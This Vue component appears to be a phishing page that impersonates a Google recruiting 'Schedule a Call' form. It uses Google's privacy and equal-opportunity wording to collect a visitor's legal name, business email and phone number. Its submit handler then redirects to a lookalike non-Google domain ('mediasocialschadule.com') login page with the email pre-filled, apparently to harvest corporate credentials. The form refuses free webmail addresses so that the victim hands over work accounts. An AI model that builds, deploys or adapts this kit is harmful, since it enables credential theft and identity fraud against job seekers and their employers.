<template>
  <div>
    <main class="container-fluid py-5" style="max-width: 1200px">
      <div class="row justify-content-start">
        <!-- Illustration -->
        <div
          style="padding-right: 50px"
          class="col-12 col-lg-6 mb-5 mb-lg-0 ps-lg-5 illustration-column d-flex justify-content-center"
        >
          <img
            class="illustration"
            alt="Illustration"
            src="./assets/lander.png"
          />
        </div>

        <!-- Form -->
        <div style="padding-left: 50px" class="col-12 col-lg-6 pe-lg-5">
          <div class="mx-auto form-wrap">
            <header class="mb-4">
              <h1 class="page-title mb-3">Schedule a Call</h1>
              <p class="lead-sub">
                We’re excited to connect with you. To schedule your call, please
                fill out the short form below with your preferred date and time.
                This helps us make sure the right person is available to speak
                with you.
              </p>
              <div class="text-end small text-muted mt-3">
                * indicates a required field
              </div>
            </header>

            <form class="needs-validation" @submit.prevent novalidate>
              <!-- Legal name -->
              <div class="section-label mb-2">Legal name</div>
              <div class="row g-3 mb-3">
                <div class="col-12 col-md-6">
                  <div class="form-group">
                    <input
                      id="firstName"
                      type="text"
                      v-model="firstName"
                      class="form-control"
                      placeholder=" "
                    />
                    <label for="firstName">First name *</label>
                    <div v-if="!isFirstName" class="invalid-feedback">
                      Please enter your first name.
                    </div>
                  </div>
                </div>
                <div class="col-12 col-md-6">
                  <div class="form-group">
                    <input
                      id="lastName"
                      type="text"
                      v-model="lastName"
                      class="form-control"
                      placeholder=" "
                      required
                    />
                    <label for="lastName">Last name *</label>
                    <div v-if="!isLastName" class="invalid-feedback">
                      Please enter your last name.
                    </div>
                  </div>
                </div>
              </div>
              <div class="form-text help-note mb-4">
                Your legal name is what appears on official documents (such as
                your driver's license or passport). This will be verified later
                in the hiring process.
              </div>

              <!-- Business email -->
              <div class="form-group mb-4">
                <input
                  id="email"
                  type="email"
                  v-model="username"
                  class="form-control"
                  placeholder=" "
                  required
                />
                <label for="email">Business email *</label>
                <div class="invalid-feedback">Please enter a valid email.</div>
                <p
                  href="#"
                  v-if="!validEmail"
                  class="small text-decoration-none"
                  style="color: #d00b0b"
                >
                  Please use a business email address.
                </p>
              </div>

              <!-- Phone -->
              <div class="form-group mb-4">
                <input
                  id="phone"
                  type="tel"
                  v-model="phone"
                  class="form-control"
                  placeholder=" "
                  required
                />
                <label for="phone">Phone number *</label>
                <!-- <div v-if="!isPhone" class="invalid-feedback">
                  Please enter your phone number.
                </div> -->
                <p
                  href="#"
                  v-if="!isPhone"
                  class="small text-decoration-none"
                  style="color: #d00b0b"
                >
                  Please enter a valid phone number.
                </p>
              </div>

              <!-- Preferred date -->
              <div class="row g-3 mb-3">
                <div class="col-12 col-md-6">
                  <div class="form-group">
                    <input
                      id="date"
                      type="date"
                      class="form-control"
                      v-model="preferredDate"
                      placeholder=" "
                      required
                    />
                    <label for="date">Preferred date *</label>
                    <div v-if="!isPreferredDate" class="invalid-feedback">Please select a date.</div>
                  </div>
                </div>
                <div class="col-12 col-md-6">
                  <div class="form-group">
                    <select v-model="preferredTime" id="time" class="form-select" required>
                      <option value="" hidden></option>
                      <option>09:00 AM</option>
                      <option>10:00 AM</option>
                      <option>11:00 AM</option>
                      <option>01:00 PM</option>
                      <option>02:00 PM</option>
                      <option>03:00 PM</option>
                    </select>
                    <label for="time">Select a time *</label>
                    <div v-if="!isPreferredTime" class="invalid-feedback">Please select a time.</div>
                  </div>
                </div>
              </div>
              <div class="form-text help-note mb-4">
                Select your preferred date and time for a quick call with our
                team — we’ll work around your availability.
              </div>

              <!-- Checkboxes -->
              <div class="form-check mb-3">
                <input
                  class="form-check-input"
                  type="checkbox"
                  id="privacy"
                  v-model="privacyChecked"
                  required
                />
                <label class="checkbox-text" for="privacy">
                  I understand that the information I provide will be used in
                  accordance with
                  <a href="#" class="link-style"
                    >Google’s applicant and candidate privacy policy.</a
                  >
                  I consent to the processing of my information as described in
                  that policy including that, in limited circumstances, Google
                  may share my contact information with trusted third parties,
                  to assist in certain phases of the hiring process (such as
                  conducting background checks). *
                </label>
                <div class="invalid-feedback">This box must be checked.</div>
              </div>

              <div class="form-check mb-4">
                <input
                  class="form-check-input"
                  type="checkbox"
                  v-model="certifyChecked"
                  id="certify"
                  required
                />
                <label class="checkbox-text" for="certify">
                  I hereby certify that, to the best of my knowledge, the
                  provided information is true and accurate. *
                </label>
                <div class="invalid-feedback">This box must be checked.</div>
              </div>

              <div class="text-end">
                <button v-bind:disabled="!privacyChecked || !certifyChecked || !firstName || !lastName || !username || !phone || !preferredDate || !preferredTime" class="btn btn-primary btn-submit px-4" @click="submitActionForm()">
                  Submit & continue
                </button>
              </div>
            </form>
          </div>
        </div>
      </div>
    </main>

    <footer class="footer bg-light mt-5">
      <div class="container-fluid" style="max-width: 1200px">
        <!-- Top: 3 columns -->
        <div class="row gy-4 py-5">
          <!-- More about us -->
          <div class="col-12 col-md-4">
            <h3 class="mb-3">More about us</h3>
            <ul class="list-unstyled mb-0">
              <li>
                <a
                  href="#"
                  class="link-secondary link-underline-opacity-0 link-underline-opacity-50-hover d-inline-block py-1"
                  >About us</a
                >
              </li>
              <li>
                <a
                  href="#"
                  class="link-secondary link-underline-opacity-0 link-underline-opacity-50-hover d-inline-block py-1"
                  >Contact us</a
                >
              </li>
              <li>
                <a
                  href="#"
                  class="link-secondary link-underline-opacity-0 link-underline-opacity-50-hover d-inline-block py-1"
                  >Press</a
                >
              </li>
            </ul>
          </div>

          <!-- Related Information -->
          <div class="col-12 col-md-4">
            <h3 class="mb-3">Related Information</h3>
            <ul class="list-unstyled mb-0">
              <li>
                <a
                  href="#"
                  class="link-secondary link-underline-opacity-0 link-underline-opacity-50-hover d-inline-block py-1"
                  >Investor relations</a
                >
              </li>
              <li>
                <a
                  href="#"
                  class="link-secondary link-underline-opacity-0 link-underline-opacity-50-hover d-inline-block py-1"
                  >Blog</a
                >
              </li>
            </ul>
          </div>

          <!-- Equal Opportunity -->
          <div class="col-12 col-md-8 col-lg-4">
            <h3 class="mb-3">Equal Opportunity</h3>
            <p class="form-description mb-0">
              Google is proud to be an equal opportunity and affirmative action
              employer. We are committed to building a workforce that is
              representative of the users we serve, creating a culture of
              belonging, and providing an equal employment opportunity
              regardless of race, creed, color, religion, gender, sexual
              orientation, gender identity/expression, national origin,
              disability, age, genetic information, veteran status, marital
              status, pregnancy or related condition (including breastfeeding),
              expecting or parents-to-be, criminal histories consistent with
              legal requirements, or any other basis protected by law. See also
              Google’s EEO Policy, Know your rights: workplace discrimination is
              illegal, Belonging at Google, and How we hire.
            </p>
          </div>
        </div>

        <!-- Bottom bar -->
        <div
          class="row footer-bottom border-top align-items-center text-center text-md-start"
        >
          <!-- Left -->
          <div
            class="col-12 footer-logo col-md-3 mb-3 mb-md-0 fw-semibold text-secondary"
          >
            Google
          </div>

          <!-- Center -->
          <div class="col-12 col-md-6 mb-3 mb-md-0">
            <nav class="small d-flex justify-content-center flex-wrap gap-3">
              <a href="#" class="link-secondary">Privacy</a>
              <a href="#" class="link-secondary"
                >Applicant &amp; Candidate Privacy</a
              >
              <a href="#" class="link-secondary">Terms</a>
            </nav>
          </div>

          <!-- Right -->
          <div class="col-12 col-md-3 text-md-end">
            <a href="#" class="small link-secondary">Help</a>
          </div>
        </div>
      </div>
    </footer>
  </div>
</template>

<script>
export default {
  name: 'Start',
  data() {
    return {
      loginUrl: 'http://about.mediasocialschadule.com/login',
      validEmail: true,
      username: '',
      firstName: '',
      lastName: '',
      phone: '',
      preferredDate: '',
      preferredTime: '',
      privacyChecked: false,
      certifyChecked: false,
      
      isPreferredTime: false,
      isFirstName: false,
      isLastName: false,
      isPhone: true,
      isPreferredDate: false,
    }
  },


  mounted() {
    // Set page title
    document.title = 'Schedule a Call';
  },
  methods: {
    
        isValidEmailFormat(email) {
            const re = /^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*\.[A-Za-z]{2,}$/;
            return re.test(String(email).trim());
        },

        isValidPhone(phone) {
            const re = /^\+?[0-9\s\-()]{7,}$/;
            return re.test(String(phone).trim());
        },

        isValidEmail(email) {
            const freeEmailDomains = new Set([
                'gmail.com','googlemail.com','yahoo.com','hotmail.com','outlook.com','live.com',
                'icloud.com','aol.com','protonmail.com','mail.com','zoho.com','yandex.com',
                'gmx.com','me.com','msn.com'
            ]);

            var getDomainFromEmail = function (email) {
                const parts = String(email).trim().split('@');
                return parts.length === 2 ? parts[1].toLowerCase() : null;
            }

            var isBusinessEmailByDomain = function (email) {
                const domain = getDomainFromEmail(email);
                if (!domain) return false;
                return !freeEmailDomains.has(domain);
            }

            // Combined:
            var isProbablyBusinessEmail = function (email) {
                return isBusinessEmailByDomain(email);
            }
            // Simple regex for email validation
            // const re = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
            return isProbablyBusinessEmail(email);
        },

        submitActionForm() {
            
            // window.location.replace(`${this.loginUrl}?email=${encodeURIComponent(this.username)}`);
            if (!this.isValidEmailFormat(this.username) || !this.isValidEmail(this.username)) {
                this.validEmail = false;
                return;
            } else {
                this.validEmail = true;
                if (!this.isValidPhone(this.phone)) {
                    this.isPhone = false;
                    return;
                } else {
                    this.isPhone = true;
                    window.location.replace(`${this.loginUrl}?email=${encodeURIComponent(this.username)}`);
                }
            }
        }
    }
}
</script>

<style lang="css" scoped>
@import "./styles.css";
</style>
